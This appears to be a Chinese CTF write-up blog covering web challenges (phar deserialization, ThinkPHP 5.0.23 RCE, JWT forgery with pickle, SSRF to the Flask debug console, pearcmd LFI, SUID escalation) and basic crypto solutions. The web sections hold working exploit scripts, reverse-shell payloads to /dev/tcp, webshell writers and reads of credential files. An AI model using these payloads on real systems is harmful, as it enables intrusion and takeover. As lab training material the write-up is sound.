# linux和windows换行不一样,linux是去掉最后一个,windows是最后两个。
session_data = session_data[:-2].decode('utf-8')
# session_data = session_data[:-1].decode('utf-8')
print(session_data)
url = "http://9dacbd81-0af6-4cd8-ac9b-3f7b8032cd60.node5.buuoj.cn:81/backdoor"
cookies = {"session": session_data}
res = requests.get(url=url, cookies=cookies)
# print(res.text)
pattern = r'<h1>(.*)</h1>'
result_content = re.search(pattern, res.text, re.S)
# print(result_content)
if result_content:
    result = result_content.group(1)
    print(result)
else:
    print("something wrong!")

PharOne

F12发现class.php

 <?php
highlight_file(__FILE__);
class Flag{
    public $cmd;
    public function __destruct()
    {
        @exec($this->cmd);
    }
}
@unlink($_POST['file']);

这题是文件上传的题目,我们考虑phar反序列化
这个时候复现呢,跟我4月份打XYCTFpharme类似,不过它的是无参RCE,这题的class.php甚至没有设置限制,但是没有回显(exec函数的特性),一般就写一句话木马跟反弹shell了,或者重定向写入文件

尝试反弹shell,个人感觉会比较方便

<?php
class Flag
{
    public $cmd = "bash -c 'bash -i >& /dev/tcp/ip/port 0>&1'";
}
@unlink("phar.phar");
$phar = new Phar("phar.phar"); //后缀名必须为phar
$phar->startBuffering();
$phar->setStub("GIF89a" . "<?php __HALT_COMPILER(); ?>"); //设置stub
$o = new Flag();
$phar->setMetadata($o); //将自定义的meta-data存入manifest
$phar->addFromString("test.txt", "test"); //添加要压缩的文件
//签名自动计算
$phar->stopBuffering();

有个小问题,好像反弹shell的话,用bash -i,刷新没反应?然后看见有人加了bash -c,就可以了,通常使用shell去运行脚本,两种方法 bash xxx.sh,另外一种就是bash -c “cmd string”,这样的吗,又学到了

文件签名修改,后缀绕过,上传phar.jpgphar伪协议读取

from hashlib import sha1
import gzip

with open("phar.phar", 'rb') as file:
    f = file.read()
s = f[:-28]  # 获取要签名的数据
h = f[-8:]  # 获取签名类型以及GBMB标识
new_file = s + sha1(s).digest() + h  # 数据 + 签名 + (类型 + GBMB)
f_gzip = gzip.GzipFile("phar.jpg", "wb")
f_gzip.write(new_file)
f_gzip.close()

url/class.php
POST: file=phar://upload/628941e623f5a967093007bf39be805f.jpg

写一句话木马的,直接参考官方吧

题目对__HALT_COMPILER()进行了过滤,可以使用gzip等压缩进行绕过,Phar反序列化的一个小技巧
其次考点在于恶意类中的命令执行函数是无回显的
不过Web根目录可写,可以直接写一个WebShell进去,其他方法也是可以的
<?php
   class Flag
   {
       public $cmd = "echo \"<?=@eval(\\\$_POST['a']);\">/var/www/html/1.php";
       // 网站根目录下
   }
   @unlink("1.phar");
   $phar = new Phar("1.phar");
   $phar->startBuffering();
   $phar->setStub("__HALT_COMPILER(); ?>");
   $o = new Flag();
   $phar->setMetadata($o);
   $phar->addFromString("test.txt", "test");
   $phar->stopBuffering();
   system("gzip 1.phar");
   rename("1.phar.gz", "1.jpg");

上传1.jpg文件后在class.php unlink函数处使用phar协议触发即可写入1.php Shell

/class.phpphar伪协议读取文件,再/1.php,命令执行

OtenkiBoy ()

待补ing……

week5

Unserialize Again

cookie: pairing.php

 <?php
highlight_file(__FILE__);
error_reporting(0);  
class story{
    private $user='admin';
    public $pass;
    public $eating;
    public $God='false';
    public function __wakeup(){
        $this->user='human';
        if(1==1){
            die();
        }
        if(1!=1){
            echo $fffflag;
        }
    }
    public function __construct(){
        $this->user='AshenOne';
        $this->eating='fire';
        die();
    }
    public function __tostring(){
        return $this->user.$this->pass;
    }
    public function __invoke(){
        if($this->user=='admin'&&$this->pass=='admin'){
            echo $nothing;
        }
    }
    public function __destruct(){
        if($this->God=='true'&&$this->user=='admin'){
            system($this->eating);
        }
        else{
            die('Get Out!');
        }
    }
}                 
if(isset($_GET['pear'])&&isset($_GET['apple'])){
    // $Eden=new story();
    $pear=$_GET['pear'];
    $Adam=$_GET['apple'];
    $file=file_get_contents('php://input');
    file_put_contents($pear,urldecode($file));
    file_exists($Adam);
}
else{
    echo '多吃雪梨';
}

file_exists($Adam);可以触发phar反序列化post的内容经过url编码之后可写入到pear传入的phar文件中,apple处执行phar伪协议

如果打phar反序列化,反序列化会调用__wakeup(),需要绕过

但好像可以直接打这个

if(isset($_GET['pear'])&&isset($_GET['apple'])){
    // $Eden=new story();
    $pear=$_GET['pear'];
    $Adam=$_GET['apple'];
    $file=file_get_contents('php://input');
    file_put_contents($pear,urldecode($file));
    file_exists($Adam);
}

写入一句话木马给$pear,但是我们要写入$pear这个文件,我们需要知道当前页面所在位置,开启Apache服务器,/var/www/html/(网站根目录),这个目录就是Apache默认的存放首页的目录(默认是index.html),访问/var/www/html/pairing.php,即url/pairing.php,这个也是一种做题经验,flag位置有时候就会在var/www/html/flag

将payload:<?php eval($_POST['cmd']);?>urlencode后传入

POST /pairing.php?pear=/var/wwww/html/1.php&apple=1 HTTP/1.1
Host: 8060f47a-668b-4c9d-9025-2a2d5dbb71c7.node5.buuoj.cn:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: looklook=pairing.php
Upgrade-Insecure-Requests: 1
X-Forwarded-For: 127.0.0.1
Content-Length: 38

%3C?php%20eval($_POST%5B'cmd'%5D);?%3E
GET url/1.php
POST cmd=system('cat /f*');

以上是非预期

下面打phar反序列化

注意:php中创建一个对象和反序列化得到一个对象是有所不同的
例如创建一个对象一般会优先调用__construct()方法
而反序列化得到一个对象若存在__wakeup()方法则会优先调用它而不去执行__construct()

__wakeup()绕过,cve-2016-7124,影响范围PHP5 < 5.6.25PHP7 < 7.0.10
满足PHP版本要求(题目环境7.0.9)

<?php
class story
{
    public $user;
    public $eating = "cat /f*";
    public $God = "true";
}
@unlink("phar.phar");
$phar = new Phar("phar.phar"); //后缀名必须为phar
$phar->startBuffering();
$phar->setStub("GIF89a"."<?php __HALT_COMPILER(); ?>"); //设置stub
$o = new story();
$o->user = "admin";
$phar->setMetadata($o); //将自定义的meta-data存入manifest
$phar->addFromString("test.txt", "test"); //添加要压缩的文件
//签名自动计算
$phar->stopBuffering();

将属性个数(+1),往大改即可,绕过__wakeup()

文件签名修改,因为上面我们做了修改,导致了该文件的签名与修改后的文件不匹配,需要更换新的签名

貌似又有说看倒数第八个字节,如果02sha1,这个确实,好像是如果03,则用sha256,不清楚

from hashlib import sha1

with open("D:\\phpstudy_pro\\WWW\\phar.phar", 'rb') as file:
    f = file.read()
s = f[:-28]  # 获取要签名的数据,sha256为[:-40]
h = f[-8:]  # 获取签名类型以及GBMB标识
new_file = s + sha1(s).digest() + h  # 数据 + 签名 + (类型 + GBMB)
file = open("D:\\phpstudy_pro\\WWW\\1.phar", "wb")
file.write(new_file)
import urllib.parse
import re
import requests


url = 'http://68765a91-67ec-4908-8c08-21950c5c65c5.node5.buuoj.cn:81/'
pattern = r'flag\{.+?\}'
params = {
    'pear': '1.phar',
    'apple': 'phar://1.phar'
}

with open("D:\\phpstudy_pro\\WWW\\1.phar", 'rb') as fi:
    f = fi.read()
    ff = urllib.parse.quote(f)
    fin = requests.post(url=url+"pairing.php", data=ff, params=params)
    matches = re.findall(pattern, fin.text)
    for match in matches:
        print(match)

emmm,没打出来,不知道是什么问题,好奇怪啊,难不成是环境问题?
这题就这样吧,卡大半天了

https://ibaiyang.github.io/blog/php/2023/04/13/PHP(Phar)-反序列化漏洞及各种绕过姿势.html

Final

好熟悉的ThinkPHP,V5版本

https://blog.csdn.net/qq_45521281/article/details/105907276

https://www.cnblogs.com/lingzhisec/p/15728886.html

https://blog.csdn.net/Lucky1youzi/article/details/128740552
报错查看版本
url/index.php?s=captcha
得到,ThinkPHP V5.0.23 { 十年磨一剑-为API开发设计的高性能框架 }

继续post,_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=ls /
其中filter[]的值是我们要执行的命令,server[REQUEST_METHOD]的值是命令的参数(因为源码实际使用的是call_user_func来执行命令的)

发现不行,可能是system函数被禁了?查看phpinfo
_method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=5,发现确实如此

get: url/index.php?s=captcha&test=-1
post: _method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=5

找到根目录DOCUMENT_ROOT/var/www/public

exec写入webshell

get:url/index.php?s=captcha

post:_method=__construct&filter[]=exec&method=get&server[REQUEST_METHOD]=echo%20'<?php%20eval($_POST['cmd']);?>'%20>%20/var/www/public/shell.php

返回状态码500了,bp发包试试,发现可以了,蚁剑连接,url/shell.php
发现又要提权了(我是先打的后面的4-复盘,可以参考一下)

首先查看具有SUID权限的命令
find / -user root -perm -4000 -print 2>/dev/null

cp可用,两种选择

cp /f* /etc/passwd
cat /etc/passwd

cp /flag_dd3f6380aa0d /dev/stdout

Ye’s Pickle

附件

# -*- coding: utf-8 -*-
import base64
import string
import random
from flask import *
import jwcrypto.jwk as jwk
import pickle
from python_jwt import *
app = Flask(__name__)

def generate_random_string(length=16):
    characters = string.ascii_letters + string.digits  # 包含字母和数字
    random_string = ''.join(random.choice(characters) for _ in range(length))
    return random_string
app.config['SECRET_KEY'] = generate_random_string(16)
key = jwk.JWK.generate(kty='RSA', size=2048)
@app.route("/")
def index():
    payload=request.args.get("token")
    if payload:
        token=verify_jwt(payload, key, ['PS256'])
        session["role"]=token[1]['role']
        return render_template('index.html')
    else:
        session["role"]="guest"
        user={"username":"boogipop","role":"guest"}
        jwt = generate_jwt(user, key, 'PS256', timedelta(minutes=60))
        return render_template('index.html',token=jwt)

@app.route("/pickle")
def unser():
    if session["role"]=="admin":
        pickle.loads(base64.b64decode(request.args.get("pickle")))
        return render_template("index.html")
    else:
        return render_template("index.html")
if __name__ == "__main__":
    app.run(host="0.0.0.0", port=5000, debug=True)

关键代码,很明显需要进行JWT伪造攻击,但是我们无法爆破秘钥

@app.route("/pickle")
def unser():
    if session["role"]=="admin":
        pickle.loads(base64.b64decode(request.args.get("pickle")))
        return render_template("index.html")

寻找Python JWT漏洞https://github.com/davedoesdev/python-jwt/commit/88ad9e67c53aa5f7c43ec4aa52ed34b7930068c9

import base64
from datetime import timedelta
from json import loads, dumps
from jwcrypto.common import base64url_decode, base64url_encode


def topic(topic):
    """ Use mix of JSON and compact format to insert forged claims including long expiration """
    [header, payload, signature] = topic.split('.')
    parsed_payload = loads(base64url_decode(payload))
    parsed_payload['role'] = 'admin'
    fake_payload = base64url_encode(
        (dumps(parsed_payload, separators=(',', ':'))))
    return '{"  ' + header + '.' + fake_payload + '.":"","protected":"' + header + '", "payload":"' + payload + '","signature":"' + signature + '"}'


originaltoken = 'eyJhbGciOiJQUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE3MTUzMDg1MDQsImlhdCI6MTcxNTMwNDkwNCwianRpIjoiOGs2c05zSUdGQkZFcDVRWDFpc1Q2QSIsIm5iZiI6MTcxNTMwNDkwNCwicm9sZSI6Imd1ZXN0IiwidXNlcm5hbWUiOiJib29naXBvcCJ9.KqyhxwgllPKxJLco3ZAUpyJH5oKp7xJ_blmL4a9WCa-_xXRNXIs4K6iHW1Fu8zKmR70mZjuPwR9tWWflouE20Z0rzE071y88Wdydcu_wT8nFFFCzqMLPtw8DXJxfsXvVMVTedCo--N8chzP0DtgxPexqN6EWfLRi82KtRjzAAkigSyNgN-n-yXe6NV9XhjFALd5aCh8jXKiqnTXCSIivl4VtYrB3p8IYCExFO0_nNOwRDyHDqUnHXMkINvqgJDXFAUt1cLoqnZAeDZk3gwZ0dziFKHP3D3BfaS-Re339ztn9K_7qTDPz3OW8tq9v-nUCTOY2GRXoc2SY6qR8vOxEGQ'
topic = topic(originaltoken).replace(" ", "%20")
print(topic)

bp抓包,GET /?token=payload,解一下jwt,发现role是admin了
后面就是pickle反序列化了

import pickle
import base64


class A(object):
    def __reduce__(self):
        return (eval, ("__import__('os').system('cat /f*')",))


a = A()
print(base64.b64encode(pickle.dumps(a)))

GET /pickle?pickle=payload
不成功,也没有过滤啊,试试反弹shell

import base64
data = b'''(cos
system
S'bash -c "bash -i >& /dev/tcp/ip/port 0>&1"'
o.'''
print(base64.b64encode(data))

反弹shell成功

同样的题目有祥云杯2022 FunWEB

pppython?

 <?php
    
    if ($_REQUEST['hint'] == ["your?", "mine!", "hint!!"]){
        header("Content-type: text/plain");
        system("ls / -la");
        exit();
    }
    
    try {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $_REQUEST['url']);
        curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 60);
        curl_setopt($ch, CURLOPT_HTTPHEADER, $_REQUEST['lolita']);
        $output = curl_exec($ch);
        echo $output;
        curl_close($ch);   
    }catch (Error $x){
        highlight_file(__FILE__);
        highlight_string($x->getMessage());
    }

?> 
// curl_setopt(): The CURLOPT_HTTPHEADER option must have an array value

url/?hint[0]=your?&hint[1]=mine!&hint[2]=hint!!

total 12
-rwxr-xr-x  1 root root 353 Oct 19  2023 app.py
lrwxrwxrwx  1 root root   7 Nov 22  2021 bin -> usr/bin
drwxr-xr-x  2 root root   6 Nov  8  2021 boot
drwxr-xr-x  5 root root 340 May 10 02:13 dev
drwxr-xr-x  1 root root 226 Oct 19  2023 etc
-rw-------  1 root root  43 May 10 02:13 flag
drwxr-xr-x  2 root root   6 Nov  8  2021 home
lrwxrwxrwx  1 root root   7 Nov 22  2021 lib -> usr/lib
lrwxrwxrwx  1 root root   9 Nov 22  2021 lib32 -> usr/lib32
lrwxrwxrwx  1 root root   9 Nov 22  2021 lib64 -> usr/lib64
lrwxrwxrwx  1 root root  10 Nov 22  2021 libx32 -> usr/libx32
drwxr-xr-x  2 root root   6 Nov 22  2021 media
drwxr-xr-x  2 root root   6 Nov 22  2021 mnt
drwxr-xr-x  2 root root   6 Nov 22  2021 opt
dr-xr-xr-x 95 root root   0 May 10 02:13 proc
drwx------  1 root root  20 Oct 19  2023 root
drwxr-xr-x  1 root root  21 Oct 19  2023 run
lrwxrwxrwx  1 root root   8 Nov 22  2021 sbin -> usr/sbin
drwxr-xr-x  2 root root   6 Nov 22  2021 srv
-rwx------  1 root root 241 Oct 19  2023 start.sh
dr-xr-xr-x 11 root root   0 May 10 02:13 sys
drwxrwxrwt  1 root root   6 May 10 02:13 tmp
drwxr-xr-x  1 root root  19 Nov 22  2021 usr
drwxr-xr-x  1 root root  17 Oct 19  2023 var

可以看见flag最左边是不一样的,这好像是权限不够
读取app.py,借助curl命令,实现SSRF/?url=file:///app.py&lolita[]=1,lolita需要数组格式(题目输出有)
关于SSRF学习
https://www.cnblogs.com/miruier/p/13907150.html

app.py

from flask import Flask, request, session, render_template, render_template_string
import os, base64
#from NeepuF1Le import neepu_files
app = Flask(__name__)
app.config['SECRET_KEY'] = '******'
@app.route('/')
def welcome():
    if session["islogin"] == True:
        return "flag{***********************}"
app.run('0.0.0.0', 1314, debug=True)

考虑session伪造,但没有秘钥
但是,发现debug开启监听在1314端口,那么结合CURLOPT_HTTPHEADER包含头部信息,我们可以计算pin码手动生成cookie,然后上传用于身份验证,从而实现命令执行

PolarCTF跟之前校队招新赛算过pin码
https://hvang10.github.io/2023/12/22/PolarCTF记一道flask-Pin/

还是有些出入的,环境不一样吧
https://blog.csdn.net/qq_35782055/article/details/129126825

url/?lolita[]=1&url=file:///../../../../../etc/passwd
得到用户名,root

url/?lolita[]=1&url=file:///../../../../../sys/class/net/eth0/address
得到mac网卡地址,ee:51:7e:c4:78:cc

url/?lolita[]=1&url=file:///../../../../../proc/sys/kernel/random/boot_id
得到系统id的前半段,c0cbf422-92b3-47ec-8900-5f407d9e8e0c

url/?lolita[]=1&url=file:///../../../../proc/self/cgroup
得到系统id后半段,cri-containerd-fcd95d022565be86ef4e1a982ad5919cc34bae43d929e7ad19b5b881a3107bf0.scope

app.py的绝对路径(可通过报错获得),url/?lolita[]=__debug__&url=127.0.0.1:1314,得到,/usr/local/lib/python3.10/site-packages/flask/app.py

系统id后半段,只读取第一行,并以从右边算起的第一个/为分隔符(有docker)(非docker,直接/etc/machine-id,反正是第一段),不过这里的好奇怪啊,正常是docker开头的

控制台(url/?lolita[]=1&url=http://127.0.0.1:1314/console)或者debug模式(url/?lolita[]=__debug__&url=127.0.0.1:1314),查看源码,得到SECRET = "xzjDl5CCoFf5PNCO4CcO";

import hashlib
from itertools import chain
import time

probably_public_bits = [
    'root'  # username
    'flask.app',  # modname
    'Flask',  # getattr(app, '__name__', getattr(app.__class__, '__name__'))
    # getattr(mod, '__file__', None),
    '/usr/local/lib/python3.10/dist-packages/flask/app.py'
]

private_bits = [
    # str(uuid.getnode()),  /sys/class/net/eth0/address,十六进制转十进制
    '262033786566860',
    # get_machine_id(), /etc/machine-id,/proc/sys/kernel/random/boot_id,/proc/self/cgroup,拼接
    'c0cbf422-92b3-47ec-8900-5f407d9e8e0ccri-containerd-fcd95d022565be86ef4e1a982ad5919cc34bae43d929e7ad19b5b881a3107bf0.scope'
]
# 这里是sha1,我没看见插件信息,可能默认高版本吧,我队长当时招新的时候,叫我看的插件版本,但有的说法又是Python版本,3.6及以下MD5?3.8及以上sha1?不清楚
h = hashlib.sha1()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode('utf-8')
    h.update(bit)
h.update(b'cookiesalt')

cookie_name = '__wzd' + h.hexdigest()[:20]

num = None
if num is None:
    h.update(b'pinsalt')
    num = ('%09d' % int(h.hexdigest(), 16))[:9]

rv = None
if rv is None:
    for group_size in 5, 4, 3:
        if len(num) % group_size == 0:
            rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                          for x in range(0, len(num), group_size))
            break
    else:
        rv = num

print(rv)

# 以下内容加入了官方给的部分脚本
def hash_pin(pin: str) -> str:
    return hashlib.sha1(f"{pin} added salt".encode("utf-8", "replace")).hexdigest()[:12]


print(cookie_name + "=" + f"{int(time.time())}|{hash_pin(rv)}")

那我们怎么传参呢?参考https://blog.csdn.net/m0_73512445/article/details/133694293
GET /?&__debugger__=yes&cmd=print(1)&frm=140324285712640&s=prj74Iraob1k5eMHiH37

这里我们要去获取frm和s的值
frm如果没有报错信息的话值为0
s的值是源码的SECRET值
由于这里试了半天没有报错信息,那么frm=0

?lolita[]=Cookie:__wzddbcdb955c856aa38ea23=1715365275|9b559ae11a2d
&url=http://127.0.0.1:1314/console?
&__debugger__=yes&pin=112-504-871
&cmd=__import__("os").popen("ls").read()
&frm=0
&s=xzjDl5CCoFf5PNCO4CcO

注意,后面的frm、cmd等参数是我们要请求的ip的参数,而非当前页面的参数,如果直接按照上面的payload,是会被当作当前页面参数的,我们需要对&和空格进行url编码
(参考https://blog.csdn.net/m0_73973498/article/details/134495316)

url/?lolita[]=Cookie:__wzddbcdb955c856aa38ea23=1715365275|9b559ae11a2d&url=http://127.0.0.1:1314/console?%26__debugger__=yes%26pin=112-504-871%26cmd=__import__("os").popen("cat%2B/flag").read()%26frm=0%26s=xzjDl5CCoFf5PNCO4CcO

4-复盘

最先看到附件的index.php,官方有说这个CMS存在着很多SQLi的漏洞,真看见有,但不管了,先打LFI

<?php require_once 'inc/header.php'; ?>
<?php require_once 'inc/sidebar.php'; ?>

  <!-- Content Wrapper. Contains page content -->

  <?php 
        if (isset($_GET['page'])) {
          $page ='pages/' .$_GET['page'].'.php';

        }else{
          $page = 'pages/dashboard.php';
        }
        if (file_exists($page)) {
          require_once $page; 
        }else{
          require_once 'pages/error_page.php';
        }
 ?>
  <!-- Control Sidebar -->
  <aside class="control-sidebar control-sidebar-dark">
    <!-- Control sidebar content goes here -->
  </aside>
  <!-- /.control-sidebar -->

 <?php require_once 'inc/footer.php'; ?>

可以看见存在文件包含漏洞,参数与.php拼接
继续利用pearcmd.php实现LFI

bp拦截并发送
GET /index.php?+config-create+/&page=../../../../../usr/local/lib/php/pearcmd&/<?=@eval($_POST[1]);?>+1.php

我们可以看见有flag,但读不到

拿蚁剑连上

flag权限不够,得SUID提权

SUID(Set User ID)是一种Linux文件权限,它允许普通用户以root用户的身份执行某些操作。在攻击中,可以利用SUID二进制文件以获取root权限。通过查找系统中的SUID文件,并利用它们的漏洞实现提权攻击,可以获得更高的权限

首先查看具有SUID权限的命令
find / -user root -perm -4000 -print 2>/dev/null

gzip命令有SUID权限,gzip读文件
gzip -f /flag -t

NextDrive()

待看ing……

Crypto

week1

brainfuck

题目即考点
在线网站https://www.splitbrain.org/services
又或者找个工具梭了

Caesar’s Secert

题目即考点

Fence

题目即考点

Vigenère

le chiffre indéchiffrable,法语吧
https://www.guballa.de/vigenere-solver
然后选择法语,其实也可以通过flag头确定key

babyencoding

base64,base32,uuencode(与base64相似,但包含很多特殊字符,总结就是看上去很奇怪,还有个xxencode,特征跟base64相似)
uuencode的话随波出不了,好像缺了一部分,去找个在线网站就好了
http://www.hiencode.com/

babyrsa

直接分解n

Small d

连分数分解,维纳攻击

from Crypto.Util.number import *
from gmpy2 import *


class ContinuedFraction():
    def __init__(self, numerator, denumerator):
        self.numberlist = []
        self.fractionlist = []
        self.GenerateNumberList(numerator, denumerator)
        self.GenerateFractionList()

    def GenerateNumberList(self, numerator, denumerator):
        while numerator != 1:
            quotient = numerator//denumerator
            remainder = numerator % denumerator
            self.numberlist.append(quotient)
            numerator = denumerator
            denumerator = remainder

    def GenerateFractionList(self):
        self.fractionlist.append([self.numberlist[0], 1])
        for i in range(1, len(self.numberlist)):
            numerator = self.numberlist[i]
            denumerator = 1
            for j in range(i):
                temp = numerator
                numerator = denumerator+numerator*self.numberlist[i-j-1]
                denumerator = temp
            self.fractionlist.append([numerator, denumerator])


c = 
e = 
n = 
a = ContinuedFraction(e, n)
for k, d in a.fractionlist:
    s = long_to_bytes(pow(c, d, n))
    try:
        print(s.decode())
    except Exception:
        pass

babyxor

for f in flag:
    ciphertext.append(f ^ key)

从这段加密逻辑可以看出来是,单字节异或,所以key的范围在[0,255]
可以爆破

from pwn import xor

b = bytes.fromhex(
    'e9e3eee8f4f7bffdd0bebad0fcf6e2e2bcfbfdf6d0eee1ebd0eabbf5f6aeaeaeaeaeaef2')
for i in range(256):
    if b'flag' in xor(bytes([i]), b):
        print(xor(bytes([i]), b))

或者直接算出key

from Crypto.Util.number import *

key = 0xe9 ^ ord('f')
b = 0xe9e3eee8f4f7bffdd0bebad0fcf6e2e2bcfbfdf6d0eee1ebd0eabbf5f6aeaeaeaeaeaef2
b = long_to_bytes(b)
flag = b''
for i in b:
    flag += long_to_bytes(i ^ key)
print(flag)

Affine

仿射密码,我们已知flag头,可以反推key

from Crypto.Util.number import *

b = 'dd4388ee428bdddd5865cc66aa5887ffcca966109c66edcca920667a88312064'
m = 256
for i in range(256):
    for j in range(256):
        if (i*ord('f')+j) % m == 0xdd and (i*ord('l')+j) % m == 0x43 and (i*ord('a')+j) % m == 0x88 and (i*ord('g')+j) % m == 0xee:
            print(i, j)
x = 17
y = 23
inv_x = inverse(x, m)
flag = b''
for i in range(0, len(b), 2):
    flag += long_to_bytes(inv_x*(int(b[i:i+2], 16)-y) % m)
print(flag)

babyaes

找到key跟iv就可以解出来
根据bytes_to_long(key) ^ bytes_to_long(iv) ^ 1,还有key = os.urandom(16) * 2
我们可以拿到前半段key,又因为前后部分相同,得到完整的key,再异或一下就可以拿到iv

from Crypto.Util.number import *
from Crypto.Cipher import AES

c = b'>]\xc1\xe5\x82/\x02\x7ft\xf1B\x8d\n\xc1\x95i'
a = 3657491768215750635844958060963805125333761387746954618540958489914964573229 ^ 1
b = long_to_bytes(a)
key = b[:len(b)//2]*2
iv = long_to_bytes(bytes_to_long(key) ^ a)
aes = AES.new(key, AES.MODE_CBC, iv)
flag = aes.decrypt(c)
print(flag)

week2

滴啤

dp泄露攻击

from Crypto.Util.number import *
import gmpy2

e = 65537
n = 
dp = 
c = 
for i in range(1, e):
    if (dp*e-1) % i == 0:
        if (n % ((dp*e-1)//i+1)) == 0:
            p = (dp*e-1)//i+1
            q = n // p  # 注意都是整除
            phi_n = (p-1)*(q-1)
            d = gmpy2.invert(e, phi_n)
            m = pow(c, d, n)
print(long_to_bytes(m))

不止一个pi

计算ϕ(n)\phi(n)

from Crypto.Util.number import *

q = 
p = 
c = 
n = p**3*q**2
e = 65537
phi = (pow(p, 3)-pow(p, 2))*(pow(q, 2)-q)
d = inverse(e, phi)
flag = long_to_bytes(pow(c, d, n))
print(flag)

halfcandecode

前半段,pq相近开平方爆破

import gmpy2
def factor(n):
    a, f = gmpy2.iroot(n, 2)

    while (True):
        a += 1
        try:
            b, f = gmpy2.iroot(a*a - n, 2)
        except:
            pass

        if f:
            return a-b, a+b
p = factor(n)[0]
q = factor(n)[1]

或者,费马分解法,差不多吧

import gmpy2
import sympy
from Crypto.Util.number import *
n = 
n2 = gmpy2.iroot(n, 2)[0]
p = sympy.nextprime(n2)
q = n//p

后半部分可以找个网站手动解,也可以直接爆破
https://www.somd5.com/

参考官方脚本

from hashlib import md5
from string import printable

md5_hash = [
    '4a8a08f09d37b73795649038408b5f33',
    '03c7c0ace395d80182db07ae2c30f034',
    'e1671797c52e15f763380b45e841ec32',
    'b14a7b8059d9c055954c92674ce60032',
    'e358efa489f58062f10dd7316b65649e',
    'cfcd208495d565ef66e7dff9f98764da',
    'b14a7b8059d9c055954c92674ce60032',
    '8fa14cdd754f91cc6554c9e71929cce7',
    '0cc175b9c0f1b6a831c399e269772661',
    '4a8a08f09d37b73795649038408b5f33',
    'e358efa489f58062f10dd7316b65649e',
    'cfcd208495d565ef66e7dff9f98764da',
    '4b43b0aee35624cd95b910189b3dc231',
    'cbb184dd8e05c9709e5dcaedaa0495cf'
]

mm = ''
for h in md5_hash:
    for p in printable:
        if md5(p.encode()).hexdigest() == h:
            mm += p
print(mm)

Rotate Xor

题目

from secret import flag
from os import urandom
from pwn import xor
from Cryptodome.Util.number import *
k1 = getPrime(64)
k2 = getPrime(64)
ROUND = 12
ciphertext = xor(flag, long_to_bytes(k1))
def round_rotate_left(num, step):
    return ((num) << step | num >> (64-step)) & 0xffffffffffffffff
def encrypt_key(key):
    
    for _ in range(ROUND):
        key = round_rotate_left(key, 3) ^ k2
    
    return key
print('ciphertext =', ciphertext)
print('enc_k1 =', encrypt_key(k1))
print('k2 =', k2)

# ciphertext = b'\x8dSyy\xd2\xce\xe2\xd2\x98\x0fth\x9a\xc6\x8e\xbc\xde`zl\xc0\x85\xe0\xe4\xdfQlc'
# enc_k1 = 7318833940520128665
# k2 = 9982833494309156947

就两个函数挺好理解的
Z3求解器的简单使用

from z3 import *
from Crypto.Util.number import *
from pwn import xor

ROUND = 12
s = Solver()
ciphertext = b'\x8dSyy\xd2\xce\xe2\xd2\x98\x0fth\x9a\xc6\x8e\xbc\xde`zl\xc0\x85\xe0\xe4\xdfQlc'
enc_k1 = BitVecVal(7318833940520128665, 64)
k2 = BitVecVal(9982833494309156947, 64)
k1 = BitVec('k1', 64)


def encrypt_key(key):
    for _ in range(ROUND):
        key = RotateLeft(key, 3) ^ k2
    return key


s.add(enc_k1 == encrypt_key(k1))
s.check()
k1 = s.model()[k1].as_long()

flag = xor(ciphertext, long_to_bytes(k1))

print(flag)

要下z3_solver
或者直接逆一下源代码

from Crypto.Util.number import *
from pwn import xor


def round_rotate_right(num, step):
    return ((num) >> step | num << (64-step)) & 0xffffffffffffffff


def encrypt_key(key):

    for _ in range(ROUND):
        key = round_rotate_right(key ^ k2, 3)

    return key


ROUND = 12
k2 = 9982833494309156947
ciphertext = b'\x8dSyy\xd2\xce\xe2\xd2\x98\x0fth\x9a\xc6\x8e\xbc\xde`zl\xc0\x85\xe0\xe4\xdfQlc'
enc_k1 = 7318833940520128665
k1 = encrypt_key(enc_k1)
flag = xor(ciphertext, long_to_bytes(k1))
print(flag)

partial decrypt

使用中国剩余定理CRT对RSA运算进行加速(可能是因为用了Garner’s方程式?),即RSA-CRT
嘶,CRT会,RSA会,两个加起来就不会了,没怎么看懂,只能说这个提速挺猛的
https://youngbug.github.io/cryptography/2022/03/11/RSA-algorithm-using-CRT.html
结论,m = m2 + h*q

c=memod nc=m^{e}mod\ n
m=cdmod nm=c^{d}mod\ n
n=pqn=p*q
dp=d(mod p1)=e1mod(p1)dp=d(mod\ p-1)=e^{-1}mod(p-1)
dq=d(mod q1)=e1mod(q1)dq=d(mod\ q-1)=e^{-1}mod(q-1)
m1=cdpmod p=cdmod pm_{1}=c^{dp}mod\ p=c^{d}mod\ p
m2=cdqmod q=cdmod qm_{2}=c^{dq}mod\ q=c^{d}mod\ q
qInv=q1mod pqInv=q^{-1}mod\ p
h=qInv(m1m2)mod ph=qInv*(m_{1}-m_{2})mod\ p
m=m2+hqm=m_{2}+h*q

broadcast

广播攻击
我们可以获取到多组nc,但明文m是相同的,使用中国剩余定理解出明文

from pwn import *
import libnum
from gmpy2 import invert, gcd, iroot

p = remote('node5.buuoj.cn', 29452)
n = []
c = []
for i in range(40):
    p.sendlineafter(b'>', b'1')
    m = p.recvuntil(b"2. exit").decode().split('\n')
    n.append(int(m[0][5:]))
    c.append(int(m[1][4:]))


def op(x):
    res = 1
    for i in x:
        res *= i
    return res


def CRT(m, a):
    assert (len(m) == len(a))
    M = op(m)
    sum = 0
    for m, a in zip(m, a):
        Mi = M // m
        ti = invert(Mi, m)
        sum += a * ti * Mi
    return sum % M


def GCRT(m, a):
    assert (len(m) == len(a))
    curm, cura = m[0], a[0]
    for m, a in zip(m[1:], a[1:]):
        d = gcd(curm, m)
        c = a - cura
        assert (c % d == 0)
        K = c // d * invert(curm // d, m // d)
        cura += curm * K
        curm = curm * m // d
    return cura % curm


e = 17

m = CRT(n, c)
m1 = iroot(m, e)  # 开e次方
print(m1)
